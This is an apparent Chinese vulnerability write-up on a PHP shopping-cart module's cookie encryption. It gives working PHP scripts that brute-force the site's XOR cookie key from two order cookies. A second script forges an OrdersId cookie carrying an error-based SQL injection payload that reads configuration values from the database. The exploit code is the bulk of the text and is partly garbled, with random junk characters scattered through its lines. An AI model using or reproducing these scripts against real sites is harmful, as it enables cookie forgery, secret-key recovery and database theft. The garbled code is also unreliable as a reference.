www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Write one cart cookie.
 *
 * @param string       $key   cookie name
 * @param array|string $value payload; arrays are flattened by enCode() first
 * @return void
 */
function saveCookie($key, $value)
{
    // Arrays become a query-string style payload before sealing; scalars are sealed as-is.
    $payload = is_array($value)
        ? $this->enCrypt($this->enCode($value))
        : $this->enCrypt($value);

    // Ten-hour lifetime, site-wide path. NOTE(review): no httponly/secure flags are
    // passed here, and enCrypt() is the only protection the payload gets.
    setcookie($key, $payload, time() + 36000, '/');
}
简单的说,$key 就是 cookie 的 key,$value 就是 value,enCode 的作用是将 array 类型转变为 a=yy&b=cc&d=know 这样的形式,关键是 enCrypt 函数。
/**
 * Seal a cookie payload: per-call XOR pass, then the site-wide setKey() pass, then base64.
 *
 * NOTE(review): the per-call key is md5(rand(0, 32000)) — only 32001 possible keys —
 * and every key byte is emitted into the output directly before the byte it masks,
 * so this pass hides nothing on its own; the scheme's strength rests entirely on setKey().
 *
 * @param string $txt plaintext payload
 * @return string base64-encoded sealed payload
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));   // 32 hex characters
    $keyLen = strlen($encrypt_key);
    $len = strlen($txt);

    $interleaved = '';
    for ($i = 0; $i < $len; $i++) {
        $k = $encrypt_key[$i % $keyLen];
        // Output pair per plaintext byte: the key byte, then plaintext XOR key byte.
        $interleaved .= $k . ($txt[$i] ^ $k);
    }

    // Outer pass with the site-wide key, then base64 so the bytes survive cookie transport.
    return base64_encode($this->setKey($interleaved));
}
/**
 * Repeating-key XOR of $txt with the hex MD5 of the lowercased site secret.
 *
 * The function is its own inverse (setKey(setKey($x)) === $x). NOTE(review): a
 * repeating-key XOR is not encryption — any known plaintext/ciphertext pair of
 * 32 bytes reveals the whole key stream, so $cfg_cookie_encode must be treated as
 * exposed once any sealed cookie can be paired with its plaintext.
 *
 * @param string $txt input bytes
 * @return string output bytes, same length as $txt
 */
function setKey($txt)
{
    global $cfg_cookie_encode;

    $siteKey = md5(strtolower($cfg_cookie_encode));   // 32 hex characters
    $keyLen = strlen($siteKey);
    $n = strlen($txt);

    $out = '';
    for ($i = 0; $i < $n; $i++) {
        $out .= $txt[$i] ^ $siteKey[$i % $keyLen];
    }

    return $out;
}
enCrypt 的参数 $txt 我们是可知的,返回值就是 cookie 的值,这个我们也是可知的。
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下:
<?php& c1 b0 p( C6 `4 h
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
% k! s( l2 n/ k/ z2 R: ~$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
2 ] A: N0 J4 F. n* M* R$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here" Y, o( ]( p" f( k6 u% M
function reStrCode($code,$string)6 P9 P' Q8 v! i
{, B! S3 R6 [" d0 {1 P7 Y
$code = base64_decode($code);0 B; M3 t o2 m4 x! w, h
$key = “”;
}0 S1 ^& |: c6 W/ N [4 J, J( Bfor($i=0 ; $i<32 ; $i++)
: C$ ?5 C3 Y# M' P, Q6 x! ~{+ E R- | D C1 z- A/ ]- @3 v
$key .= $string[$i] ^ $code[$i];
+ |% V, ^+ j, a/ s, M+ w}
$ b3 I3 T% C z2 G- vreturn $key;
) \$ g ^& z: T6 S3 I' {+ f}
( P" C( z* ~5 j% Qfunction getKeys($cookie,$plantxt)
3 ?; h: C" B6 i; U{
" U2 y7 D8 m5 U" s% }$tmp = $cookie;" _+ u) k, A; _8 S! w" c4 `
$results = array();
! v, @9 F5 c4 I5 k- pfor($j=0 ; $j < 32000; $j++); G+ M. e9 J* g, y% H- T* ~
{; R, q+ O0 h' v' W0 H; U6 M4 F
- z% q) V# G! E6 q0 U3 j$txt = $plantxt;1 e! v) R! Y$ ~3 ^" \
$ctr = 0;6 H8 _% @' [: Z9 V6 \
$tmp = ”;+ m: O( _8 w( m% w, [6 f- F. j
$encrypt_key = md5($j);
& w, B: b; A' T2 h- `4 h$ yfor($i =0; $i < strlen($txt); $i ++)
/ q/ I& D. o( \7 ? W6 u0 x{( `& A& h; a# X) a; L7 h. x0 F
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 U& s5 P v2 Z Q$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
% n% j1 S/ c% ], ^) d}
/ ~7 Z) W6 O7 @$ W+ J$ {/ K$string = $tmp;- S( K1 R1 q( B- j
$code = $cookie;' ?: e) F) F, L' |1 l
$result = reStrCode($code,$string);
6 F+ P$ C: w0 X# k- r3 \if(eregi(‘^[a-z0-9]+$’,$result))
0 U5 ]' C9 `- M# T( D6 w" k/ Y{, N/ B2 ^$ h6 v+ u( m: G
echo $result.”\n”;: c2 [4 M6 A2 [) {
$results[] = $result;$ D% V) l1 N5 v" `) D1 D% F
}' R2 y# S. ~8 p0 M" d
}
8 [+ N9 Y$ I* D# Qreturn $results;
* |% s, [/ L7 I' L}
8 z1 \9 {8 h& ~: q' [! @$results1 = getKeys($cookie1,$plantxt);
# L; R- r0 t3 ~! ~$results2 = getKeys($cookie2,$plantxt);& S7 ?5 j: {1 g- t
print “\n——————–real key————————–\n”;, v& m% X% p) _# `; \- U- h
foreach($results1 as $test1)
3 n3 Z/ W# \( F1 @7 a{
8 I+ A( I# F* a1 j" yforeach($results2 as $test2)
) r2 A0 A5 r) k3 }{4 \- J/ F$ n' p4 _8 j$ K' ]# E& I! s
if($test1 == $test2)3 r" y" k4 h& M/ h& m
{
* A g( S9 w) ]0 L7 E0 W- recho $test1.”\n”;3 d: ]5 t! ~' J5 i9 v2 T- d" L
}
) Y5 m6 I0 a1 g3 T/ [& U5 h}! ?4 T6 g2 W7 m* O! S" v5 l
}
+ y/ A+ P5 s& o% g?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie,
plantxt 可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))
得到这个 key 之后,我们就可以构造任意购物车的 cookie
接着看
; ^7 S5 \# \$ H# _5 [$ v& R t20 class MemberShops
, n: V: {; X1 X. f5 Z0 `5 H( P% e21 {
$ I" W: l& Z; i22 var $OrdersId;
' m# L J: l( r/ ]5 _% e' F2 N9 K* t+ u23 var $productsId;
3 `7 @! ^$ e, C; W! M. O. z24
/**
 * Bind this cart to an order id.
 *
 * The id is read from the client's "OrdersId" cookie; a fresh one is generated
 * only when that cookie is missing or empty. NOTE(review): a cookie-supplied id is
 * adopted as-is here, so any validation must happen in getCookie() or downstream.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if (!empty($this->OrdersId)) {
        return;   // client already carries an order id
    }
    $this->OrdersId = $this->MakeOrders();
}
发现 OrdersId 是从 cookie 里面获取的
然后
/plus/carbuyaction.php 中的
# _4 e/ e0 [6 |, f29 $cart = new MemberShops();
& m* \8 J, B. [5 G# F/ W39 $OrdersId = $cart->OrdersId; //本次记录的订单号1 z, L, d ~5 V1 }
……
// NOTE(review): $OrdersId is interpolated directly into the SQL string. It originates
// from the client's "OrdersId" cookie (see MemberShops::__construct), so unless
// getCookie() already rejects anything but a well-formed id this is an injection point;
// the value should be bound/escaped through the DB layer or validated against the
// expected order-id format before it reaches this query.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了
通过利用下面代码生成 cookie:
<?php* E! E/ e2 {9 h2 B
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
# F6 p2 H' z. H( I0 s# E" G z4 X$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here8 m' n& ?1 u e! ^% F
function setKey($txt)
; a3 p x, M) N/ O{
- U' _. [3 }7 rglobal $encrypt_key;% y w+ P0 y0 A% t- u7 ~5 D, f
$ctr = 0;1 G2 H6 O# g3 Q3 t4 N# H4 y
$tmp = ”; V/ U5 i0 G( S1 ]: m0 {2 `
for($i = 0; $i < strlen($txt); $i++)
4 i. u& }- G2 }7 N" T" V5 u{
+ W* k6 z! k7 E' |$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) Z; f7 c- b+ S; m. n
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];$ Q' W2 `. s2 G- h* H
}" v" v: e' m& Q" h" [+ r$ `/ P
return $tmp;2 @2 P$ f- `6 c' x
}/ w7 o& z' _/ W( k
function enCrypt($txt)1 q7 ]3 }/ t6 p( H9 T) z
{
+ {. s2 x `* S. N% ]/ Msrand((double)microtime() * 1000000);
0 M; y: e' S: d* L$encrypt_key = md5(rand(0, 32000));0 ^/ E* O3 [& q
$ctr = 0;
3 r8 e& C0 g8 i* s! i$tmp = ”;' u" H9 d9 e1 q# _: T
for($i = 0; $i < strlen($txt); $i++)$ p( o. V- G' U* } Y( I7 ^
{' _5 `7 V6 T, M3 p
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; j% x- P/ t$ g2 F& S
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);/ ^/ s# u" k/ U0 O
}
( d/ [( ?8 m1 ? `2 d# c/ mreturn base64_encode(setKey($tmp)); a" ?6 q( ?4 C$ k$ ~* `
} l) {" E; x% ^2 F
for($dest =0;$dest = enCrypt($txt);)
1 K5 X- ]0 b+ H/ z% V. f{
5 x X8 z% ]) B6 i* r) bif(!strpos($dest,’+'))0 ~- G1 y1 b' \% ]
{
2 w- X6 W; C( f( `7 K. Q! Ubreak;' L: G! h; l/ p# r3 j, G
}# P4 B- B8 Q0 m9 F
}
- y6 l- Y' o( \8 {echo $dest.”\n”;
. w$ w* O+ g$ A# B# m4 L?>
; X3 E/ z' H$ R( u1 |) a7 o0 I; l4 e* g
|